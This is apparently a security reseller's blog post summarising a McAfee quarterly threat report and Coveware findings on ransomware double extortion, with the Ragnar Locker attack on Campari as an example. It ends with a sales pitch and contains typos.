Disturbing increase in cyberthreats in the second quarter of the year, more than 400 new cyberthreats were recorded every minute, according to a new report from cybersecurity firm McAfee. Nw malware samples also grew by 11.5 percent for the period.
PowerShell malware and Covid-19-themed attacks dominated the landscape. Malicious Donoff Office document attacks propelled new PowerShell malware upwards by 117 percent. The documents behave as TrojanDownloaders by using Windows Command to launch PowerShell, which then downloads and executes malicious files.
McAfee claims Donoff also played a “ critical role” in driving the 689 percent surge in PowerShell malware in the quarter prior to this one.
Covid-19 was another theme exploited by cybercriminals in the second quarter of the year. McAfee’s network, boasts more than a billion sensors, and registered a 605 percent increase in Covid-19-related attacks compared to Q1.
“,,,,,,,,, a deluge of malicious URLs, attacks on cloud users and capable threat actors leveraging the world’s thirst for more information on Covid-19 as an entry mechanism into systems across the globe,” said Raj Samani, McAfee Fellow and Chief Scientist.
McAfee said there were almost 7.5 million external attacks on cloud user accounts in the quarter. According to the firm, all major industries were affected, including: financial services, healthcare, public sector, education, retail, technology and more.
In 2019, the Maze ransomware group introduced a new tactic known as double-extortion, which is when attackers steal unencrypted files and then threaten to release them publicly if a ransom is not paid. Ransomware gangs are increasingly failing to keep their promise to delete stolen data after a victim pays a ransom. ther ransomware operations, who began to create data leak sites used to publish victims’ stolen files.As part of this double-extortion tactic, most ransomware operations require a victim to pay a single ransom that will provide both a decryptor for their encrypted files and a promise not to share and to delete stolen files.Some ransomware operations, like AKO/Ranzy, demand two ransom payments, one for the decryptor and another not to publish stolen data.
In the recently released Coveware Q3 2020 ransomware report r we learn that some ransomware gangs do not keep their promise to delete stolen data after a ransom is paid. Certain groups are leaking stolen data after a ransom was paid, using fake data as proof of deletion, or even re-extorting a victim using the same data that was paid not to be released.
Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.
Netwalker: Data posted of companies that had paid for it not to be leaked
Mespinoza: Data posted of companies that had paid for it not to be leaked
Conti: Fake files are shown as proof of deletion
Unlike a ransomware decryptor, which a threat actor can’t take away once given, there is no way for a victim to know for sure if a ransomware operation is deleting stolen data after a ransom payment is made. Due to this, Coveware says that it does not make sense to pay a ransom as there is no way to know for sure it will not be used to extort you further in the future. With this in mind, Coveware tells victims to expect the following even if they do decide to pay, so their data is not released:
– The data may not be credibly deleted. Victims should assume it will be traded to other threat actors, sold, or held for a second/future extortion attempt
– Stolen data custody held by multiple parties and not secured. Evenwhenf the threat actor deletes a volume of data following a payment, other parties that had access to it may already have made copies so that they can extort the victim in the future
– The data may get posted anyway by mistake or on purpose before a victim can even respond to an extortion attempt
Companies should automatically assume that their data has been shared among multiple threat actors and that it will be used or leaked in some manner in the future, regardless of whether they paid. They should treat the attack as a data breach and properly inform all customers, employees, and business partners that their data was stolen as required by law.
Doing this may b e embarrassing and painful but at least the companies look better for trying to do the right thing and gives those who were exposed the ability to monitor and protect their accounts from fraud.
A recent example of such an attack is Campari Campari Group an Italian beverage company known for its popular liquor brands, including Campari, Frangelico, SKYY vodka, Epsolon, Wild Turkey, and Grand Marnier. It was recently hit by a Ragnar Locker ransomware attack, where 2 TB of unencrypted files was allegedly stolen. To recover their files, Ragnar Locker is demanding $15 million.
As proof that they stole data, the ransom note contains eight URLs to screenshots of some of the stolen data. These screenshots are for sensitive documents, such as bank statements, a UK passport, employee U.S. W-4 tax forms, a spreadsheet containing SSNs, and a confidentiality agreement.
Ragnar Locker claims to have encrypted most of Campari Group’s servers from twenty-four countries and are demanding $15,000,000 in bitcoins for a decryptor. This price also includes a promise to delete data from their file servers and not publish or share the data, as well as a network penetration report and recommendations to improve security.
Ragnar Locker has been involved in other large attacks this year, including ones on Portuguese multinational energy giant Energias de Portugal (EDP) and French maritime transport and logistics company CMA CGM.
We advise all companies to regularly review and update their security policies, training and cyberdefence solutions.
Ask us about end point solutions or consider whether managed cloud hosted systems is preferable.
009714336589
